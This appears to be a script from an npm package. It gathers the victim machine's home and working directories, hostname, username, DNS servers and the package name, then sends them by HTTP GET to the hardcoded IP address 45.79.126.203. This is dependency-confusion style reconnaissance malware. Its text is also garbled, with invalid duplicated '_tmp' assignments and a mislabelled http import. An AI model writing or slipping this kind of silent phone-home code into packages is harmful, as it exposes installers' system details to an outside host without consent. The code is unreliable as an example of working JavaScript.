const os = require("os")
const dns = require("dns")
const querystring = require("querystring")
const https = require("http")
const packageJSON = require("./package.json")
const package = packageJSON.name
const parameters = {
    Current_Directory: __dirname,
    Home_Directory: os.homedir(),
    Hostname: os.hostname(),
    Username: os.userInfo().username,
    DnsServer: dns.getServers(),
    Package: package
}
_tmp_0.Current_Directory = __dirname
_tmp_0.Home_Directory = os.homedir()
_tmp_0.Hostname = os.hostname()
_tmp_0.Username = os.userInfo().username
_tmp_0.DnsServer = dns.getServers()
_tmp_0.Package = package
const get_request_args = querystring.stringify(parameters)
var options = {
    hostname: "45.79.126.203",
    port: 80,
    path: "/?" + get_request_args,
    method: "GET",
    headers: {
        "Content-Type": "application/json"
    },
}
_tmp_1.hostname = "45.79.126.203"
_tmp_1.port = 80
_tmp_1.path = "/?" + get_request_args
_tmp_1.method = "GET"
_tmp_1.headers = {
        "Content-Type": "application/json"
    }
_tmp_2.Content-Type = "application/json"
var req = https.request(options, (res) => {
    res.on("data", (d) => {
        process.stdout.write(d);
    });
})
